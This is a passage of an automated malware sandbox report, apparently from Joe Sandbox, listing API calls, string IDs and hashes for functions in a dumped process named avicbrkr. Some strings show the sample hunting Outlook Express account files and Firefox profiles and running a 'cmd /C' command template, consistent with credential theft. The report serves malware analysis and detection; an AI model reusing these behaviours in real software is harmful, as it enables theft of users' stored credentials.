                      • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0037789D
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$ObjectSingleWait$CloseCriticalFirstFreeNextSectionmemset$EnterHeapLeaveLocallstrlenwcscpy
                      • String ID: R9
                      • API String ID: 1001867990-134138977
                      • Opcode ID: e54c7b3c9857a391038a1f78ffe8193aef54523fa9e8a69f74ec2e45215549b4
                      • Instruction ID: ab49eb852aab4341f84d6d0b682f43e75fe11a7a97cebeeb603544a5a9d7a9ac
                      • Opcode Fuzzy Hash: e54c7b3c9857a391038a1f78ffe8193aef54523fa9e8a69f74ec2e45215549b4
                      • Instruction Fuzzy Hash: EE313F72518205AFC722AF64CC8982FBBE9FB88358F11492AF48897121E735DD05DB52
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      • HeapFree.KERNEL32(00000000,?,?), ref: 0037969B
                        • Part of subcall function 00389807: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0038F8D5,00000008,00000000,00000000,?,?,0038FB66,?,?,00000001,00000000,00000000), ref: 00389810
                        • Part of subcall function 00389807: mbstowcs.NTDLL ref: 00389837
                        • Part of subcall function 00389807: memset.NTDLL ref: 00389849
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,00000004,00000002,?,00000016,00000000,00000000,00000004,00000004,?,20000013,00000000), ref: 0038FE5E
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32 ref: 0038FE78
                      • wcstombs.NTDLL ref: 0037967F
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$CriticalFreeHeapLeaveSectionlstrlenmbstowcsmemsetwcstombs
                      • String ID: ZN9
                      • API String ID: 3141939236-2945816823
                      • Opcode ID: 4a9feb752ba8ffcc720f0e84435dca81cc907e23ef9c737469b25908afc31bd8
                      • Instruction ID: 40371a3f6f0a57391bb65e73afa7725d3e65ae5825b5b4a679ad2430e7120da7
                      • Opcode Fuzzy Hash: 4a9feb752ba8ffcc720f0e84435dca81cc907e23ef9c737469b25908afc31bd8
                      • Instruction Fuzzy Hash: 2F31167150122AAFCF339F55C884BAE7B69BF18B60F16C626FD094A110D73999A0DFD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • lstrlenW.KERNEL32(0039F7B4,?,00000000), ref: 00391073
                        • Part of subcall function 00390D1B: memset.NTDLL ref: 00390D78
                        • Part of subcall function 00390D1B: LocalFree.KERNEL32(00000000), ref: 00390EF3
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?), ref: 003910F9
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$AllocateCloseLocallstrlenmemset
                      • String ID: EW9
                      • API String ID: 1398430810-602920354
                      • Opcode ID: ceca93b027c854362e108dd8926e7e1b10d98a7bea841f5c3e01b4e254cb2d32
                      • Instruction ID: bade0887d16d35adafa1ed68df998e84bf131b90d90a11be8e88a503bc1c462d
                      • Opcode Fuzzy Hash: ceca93b027c854362e108dd8926e7e1b10d98a7bea841f5c3e01b4e254cb2d32
                      • Instruction Fuzzy Hash: 66316DB2108246BFDF139F50DC85C6BBFADFB84398F10492AF585A1161D7328D94DBA2
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00004004), ref: 0037B57E
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0037B598
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateCreateEventHeap
                      • String ID: gU9
                      • API String ID: 4104841997-705701294
                      • Opcode ID: 894799de162edca0a4809ba6b3ec69bbf35b9e0d53aeafb52b216c6bde1332b0
                      • Instruction ID: 0e35913328a01c9c7d292b59f9f515661eb95c9a3d5560d0d812dca8e5fdfe7e
                      • Opcode Fuzzy Hash: 894799de162edca0a4809ba6b3ec69bbf35b9e0d53aeafb52b216c6bde1332b0
                      • Instruction Fuzzy Hash: 5E114CB2200205AFD7319B64CCC4E67B7FDEF49764B158829F64AD7550D73AEC418B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • StrTrimA.SHLWAPI(?,003973F4), ref: 00389E55
                      • StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389E72
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Trim$AllocateHeap
                      • String ID: ~FvR9
                      • API String ID: 3808977111-3041887914
                      • Opcode ID: 02ecdaf10cf4dcbc596a584b9c0777604bbd204f52d0288c45896534c8872e49
                      • Instruction ID: aaf7097ac73b262e55eeb378e3cd439c8d4a74ef14dd6667bf336acf7bc32731
                      • Opcode Fuzzy Hash: 02ecdaf10cf4dcbc596a584b9c0777604bbd204f52d0288c45896534c8872e49
                      • Instruction Fuzzy Hash: 4501B9716053215BD222DF59CC48F3BBF9CEB89B90F16155AF881C7240DA61DC0293A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • mbstowcs.NTDLL ref: 00387446
                      • mbstowcs.NTDLL ref: 0038746C
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$CloseCriticalFirstHeapNextObjectSectionSingleWaitmbstowcsmemset$AllocateEnterFreeLeavewcscpy
                      • String ID: account{*}.oeaccount
                      • API String ID: 3268584642-4234512180
                      • Opcode ID: e5c431615e16dabe095f2f77b223f45988cad9afbfc6dbc60a0e56d21f607755
                      • Instruction ID: 529aec821bcb34e9ca7998c322a705a16c2bd6daf407313f0e629a59adb6b3e6
                      • Opcode Fuzzy Hash: e5c431615e16dabe095f2f77b223f45988cad9afbfc6dbc60a0e56d21f607755
                      • Instruction Fuzzy Hash: C2019673910208B7CF22BBE9CC86F9F7EADEB48710F104465F504E7141EA75DA0587A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0037BC08
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037BC57
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree
                      • String ID: L"7
                      • API String ID: 2488874121-2580434585
                      • Opcode ID: 3a1594ae445d1f50fb47049091782824ced81e7d61c6e48e2a32024cb08f789f
                      • Instruction ID: ad2a09b242052523cd7568a726aa5288862852b52fae47d866cd6ba69cb767a7
                      • Opcode Fuzzy Hash: 3a1594ae445d1f50fb47049091782824ced81e7d61c6e48e2a32024cb08f789f
                      • Instruction Fuzzy Hash: 23115B75600224AFC723AB65DD89D6BBB7CFF867907108456F40987224DB359D41CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00377AA5
                        • Part of subcall function 003776C1: memset.NTDLL ref: 003776D9
                        • Part of subcall function 003776C1: lstrlenW.KERNEL32(00000000,00000000,00000000,0039CD50,00000000,cmd /C "%s> %s1"), ref: 00377712
                        • Part of subcall function 003776C1: wcstombs.NTDLL ref: 0037771C
                        • Part of subcall function 003776C1: CreateProcessA.KERNEL32(00000000,00377AD2,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 00377750
                        • Part of subcall function 003776C1: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00377771
                        • Part of subcall function 003776C1: GetExitCodeProcess.KERNEL32(?,?), ref: 0037778E
                        • Part of subcall function 003776C1: GetLastError.KERNEL32 ref: 003777A6
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 00377B09
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapProcess$AllocateCodeCreateErrorExitFreeLastMultipleObjectsWaitlstrlenmemsetwcstombs
                      • String ID: cmd /C "%s> %s1"
                      • API String ID: 553568828-3818503316
                      • Opcode ID: 866a729b50c62e94591eb7874d7f55acee35c41f09f101880f2f70c4dad3531b
                      • Instruction ID: 0a9d48b56e2135b025eac269fef962b941805c8db5c06eb548a90a1f3a8306f8
                      • Opcode Fuzzy Hash: 866a729b50c62e94591eb7874d7f55acee35c41f09f101880f2f70c4dad3531b
                      • Instruction Fuzzy Hash: 21118E76904118FFDF23AF54DC41E9E7F69EF047A0F158452FD08A6261D236AE609BD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetCommandLineW.KERNEL32(00000000,5AFF7C2A,5AFF7C2A,00000001,0037B75E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605), ref: 003723E1
                      • ExitProcess.KERNEL32 ref: 00372454
                        • Part of subcall function 00391663: FindFirstFileW.KERNEL32(?,?,?,0039F9E0), ref: 003916E1
                        • Part of subcall function 00391663: FindNextFileW.KERNEL32(?,00000010), ref: 0039176B
                        • Part of subcall function 00391663: FindClose.KERNEL32(00000002), ref: 00391779
                        • Part of subcall function 00391663: FreeLibrary.KERNEL32(?), ref: 0039178B
                        • Part of subcall function 003722AA: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 003722CD
                        • Part of subcall function 003722AA: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037230E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$FileFreeHeap$AllocateCloseCommandExitFirstLibraryLineNextProcess
                      • String ID: gU9
                      • API String ID: 2330343010-705701294
                      • Opcode ID: 91379467f2f6223d97080d9a5cd4a6ba58a5c8f35beaff73ac90dfec5edd6de7
                      • Instruction ID: 709125342ab3714d164014ae33e57d4511c5d31472b15adb6ab823ea6e280316
                      • Opcode Fuzzy Hash: 91379467f2f6223d97080d9a5cd4a6ba58a5c8f35beaff73ac90dfec5edd6de7
                      • Instruction Fuzzy Hash: 5F010C31A10215AFDF22ABA2DC49B9F7BBCAF04741F058065F909E6190DB79DE41CB61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00378866
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00378899
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree
                      • String ID: ZN9
                      • API String ID: 2488874121-2945816823
                      • Opcode ID: f76789e2192d573b170597a8bd4c3d6e5db77ecfaf16d451b0dad00c67364525
                      • Instruction ID: 23bfc063c804ae868fda3c26b590b4f6eb3492dfc646c4e4dbcbcd937d8bc926
                      • Opcode Fuzzy Hash: f76789e2192d573b170597a8bd4c3d6e5db77ecfaf16d451b0dad00c67364525
                      • Instruction Fuzzy Hash: 92014BB6910208FFEB12DF99DCC5DAFBBBCEB44390F104066FA01A2250D6769E419B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003785F7
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037861C
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree
                      • String ID: )O9
                      • API String ID: 2488874121-3761864639
                      • Opcode ID: a525a6a8206566391b718f95919ad3776b2e2367203753d70d96df5fe7582855
                      • Instruction ID: 458fbd47fd2906cf77156df2b1f7d3774354122aa24ad5e8c60936aa25b53941
                      • Opcode Fuzzy Hash: a525a6a8206566391b718f95919ad3776b2e2367203753d70d96df5fe7582855
                      • Instruction Fuzzy Hash: AE0162B650000CFF9B12DF95DC84CAE7BBEEB89394B114062FA05D3110D67A9E01DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetVersion.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00388397
                      • GetModuleHandleA.KERNEL32(0039E01D,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003883C4
                        • Part of subcall function 0038A8DB: GetModuleHandleA.KERNEL32(0039E8AE,0039712C,0039712C,00000000,?,?,?,00000001,003883AE,?,0000005C,?,0037DDEC,?,?,0039E605), ref: 0038A8EC
                        • Part of subcall function 0038A8DB: LoadLibraryA.KERNEL32(0039EB71), ref: 0038A986
                        • Part of subcall function 0038A8DB: FreeLibrary.KERNEL32(00000000), ref: 0038A991
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HandleLibraryModule$AllocateFreeHeapLoadVersion
                      • String ID: H}*
                      • API String ID: 3715412493-3236088583
                      • Opcode ID: 08847abf288af1fd352bb71529561fc37048fb7fdf9a3ee65d3a5de083fd4d90
                      • Instruction ID: 0efed7d63a193e05a3cd5995547ae8312d0803b6034f115c6b62da5abe61e6c9
                      • Opcode Fuzzy Hash: 08847abf288af1fd352bb71529561fc37048fb7fdf9a3ee65d3a5de083fd4d90
                      • Instruction Fuzzy Hash: FD0192BA910311DFDB23AF7AAD875067BACF748711F41497BE045C7264CBB268418B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00371E33
                        • Part of subcall function 00371C56: lstrlen.KERNEL32(%APPDATA%), ref: 00371C6E
                        • Part of subcall function 00371C56: RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00371CB9
                        • Part of subcall function 00371C56: mbstowcs.NTDLL ref: 00371CCC
                        • Part of subcall function 00371C56: lstrcatW.KERNEL32(00000000,0039E774), ref: 00371CDB
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00371CFF
                        • Part of subcall function 00371C56: RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00371D11
                        • Part of subcall function 00371C56: lstrcatW.KERNEL32(00000000,003973F0), ref: 00371D33
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,00000000), ref: 00371D57
                        • Part of subcall function 00371C56: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00371D7D
                        • Part of subcall function 00371C56: DeleteFileW.KERNEL32(?), ref: 00371DCC
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,?), ref: 00371DDA
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,?), ref: 00371DF6
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371E78
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$lstrcat$CreateDeleteDirectoryFilelstrlenmbstowcs
                      • String ID: ]U9
                      • API String ID: 127329105-65816040
                      • Opcode ID: ed1180c25afa60b726868a7a7ee6d5d2535b5a53bf7f145f2b8494b8ce46428e
                      • Instruction ID: 67cc8c16c09979eb55844626f8998530b80b38212bf666a49d206949d8151363
                      • Opcode Fuzzy Hash: ed1180c25afa60b726868a7a7ee6d5d2535b5a53bf7f145f2b8494b8ce46428e
                      • Instruction Fuzzy Hash: 41F0B4F32053193EE33337696C89E6B2A4DDB817E4F114022F60596190DA698C4285B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memcpy.NTDLL(?,?,?), ref: 00378109
                      • StrToIntExA.SHLWAPI(00000000,00000001,00000000), ref: 0037811B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: ~FvR9
                      • API String ID: 3510742995-3041887914
                      • Opcode ID: 100229854cb540b7d4b2ec23dcfa860b84a5d0e8693fd3a85f530445d393c0ef
                      • Instruction ID: 0e78b178dde0b7069217e810bbdb50bd8a89538e50a65e0fe2290d2fdd7befa4
                      • Opcode Fuzzy Hash: 100229854cb540b7d4b2ec23dcfa860b84a5d0e8693fd3a85f530445d393c0ef
                      • Instruction Fuzzy Hash: 3C017175910219BBDB12EBA8CC05AEEBBB9FB58740F404425E904E7250EB75EA0AC7D1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • _wcsupr.NTDLL ref: 0038D863
                      • lstrlenW.KERNEL32(00000000), ref: 0038D86B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree_wcsuprlstrlen
                      • String ID: R9
                      • API String ID: 2355695313-134138977
                      • Opcode ID: b7902668f28daf6996588abb135ed1b539effbe53a5ee46c00a22c8f0d2bf7a5
                      • Instruction ID: 8b744f3ac363c83d4e4bd71666ac744d54fd69fa9f3ba221e1d8b20b29418a75
                      • Opcode Fuzzy Hash: b7902668f28daf6996588abb135ed1b539effbe53a5ee46c00a22c8f0d2bf7a5
                      • Instruction Fuzzy Hash: 6DF0E2322117116F93237BB8AC89E6F6A5DEF81BA0F21457AF445C6291CE65CC0283A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 003881F9
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038820A
                        • Part of subcall function 00387EF9: lstrlen.KERNEL32(?,?,00000000,?,0037B64A,00000000,?,0000005C,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC), ref: 00387F47
                        • Part of subcall function 00387EF9: lstrcpy.KERNEL32(00000000,?), ref: 00387F68
                        • Part of subcall function 00387EF9: GetLastError.KERNEL32(?,00000000,0037DB89,?,0039D270,?,00000000,003713EB), ref: 0038802E
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterErrorFreeHeapLastLeavelstrcpylstrlen
                      • String ID: H}*
                      • API String ID: 2732097048-3236088583
                      • Opcode ID: 14111a80687c924962611589c9df5ac572fde31720e46cb425c3dc0cfe9ab526
                      • Instruction ID: bab2bfc98b1788c38551c724557324760527e48f3f15e5fe2592e9cbbf486191
                      • Opcode Fuzzy Hash: 14111a80687c924962611589c9df5ac572fde31720e46cb425c3dc0cfe9ab526
                      • Instruction Fuzzy Hash: CDF08C726093059BC712AF28D84496BB7E8EFA8751F0148AEF88587312DB35E8058BA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • DeleteFileA.KERNEL32(00000000,00000000,?,?,00000001,00000929,00000000,0000005C,?,00372304,00000000,00000000,?,0000000E), ref: 00377D76
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00377D85
                        • Part of subcall function 003779BC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                        • Part of subcall function 003779BC: lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                        • Part of subcall function 003779BC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                        • Part of subcall function 003779BC: mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                        • Part of subcall function 003779BC: CloseHandle.KERNEL32(?), ref: 00377A61
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeap$Free$Time$AllocateCloseCreateCurrentDeleteHandleNameSystemTempThreadlstrcpylstrlenmbstowcs
                      • String ID: 6$7\
                      • API String ID: 2003494416-966405046
                      • Opcode ID: 70b0a4b2e17cdd33f91205f8bb8e14f2a864a7a6b343ddc7f52b44eb7ed6f73b
                      • Instruction ID: bcc0919cce194158d31519ec4dac2dad2674926d28f09c082fa24f4c975d7577
                      • Opcode Fuzzy Hash: 70b0a4b2e17cdd33f91205f8bb8e14f2a864a7a6b343ddc7f52b44eb7ed6f73b
                      • Instruction Fuzzy Hash: 7EF05533209611BBC6336B21DC0AF9F3E1ACFC13A0F114029F2488A2E0DB36C806D7A1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • DeleteFileW.KERNEL32(00000000), ref: 00373080
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003892D7: lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,00373090,00000000), ref: 003892FB
                        • Part of subcall function 003892D7: lstrcpy.KERNEL32(00000000), ref: 0038932B
                        • Part of subcall function 003892D7: GetTickCount.KERNEL32(00000104), ref: 00389353
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Freelstrlen$AllocateCountDeleteErrorFileLastTicklstrcpywsprintf
                      • String ID: L"7
                      • API String ID: 2703577323-2580434585
                      • Opcode ID: 6f88456f80297bca1d123adcd53822c2074794db7bd11f7df0c67571dd816229
                      • Instruction ID: ba9f5bb17972d11aec5610a2e14ae080a1d10aa082c94f17dac85ff9b73a46bc
                      • Opcode Fuzzy Hash: 6f88456f80297bca1d123adcd53822c2074794db7bd11f7df0c67571dd816229
                      • Instruction Fuzzy Hash: CAE068332051640F8B333B799C4A4BF224D9D82331743C526FC2AE72C0EF2E8E026251
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D4E0), ref: 00388103
                      • RtlLeaveCriticalSection.NTDLL(0039D4E0), ref: 0038813F
                        • Part of subcall function 00387EF9: lstrlen.KERNEL32(?,?,00000000,?,0037B64A,00000000,?,0000005C,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC), ref: 00387F47
                        • Part of subcall function 00387EF9: lstrcpy.KERNEL32(00000000,?), ref: 00387F68
                        • Part of subcall function 00387EF9: GetLastError.KERNEL32(?,00000000,0037DB89,?,0039D270,?,00000000,003713EB), ref: 0038802E
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterErrorFreeHeapLastLeavelstrcpylstrlen
                      • String ID: H}*
                      • API String ID: 2732097048-3236088583
                      • Opcode ID: c125926760b8969e3e12818e978880b3594deecd970be9a9d9bd5f01c09b817c
                      • Instruction ID: ff78928416c44763be0493a4c0545faae36baeab8d83adc23c967a6c9c35f073
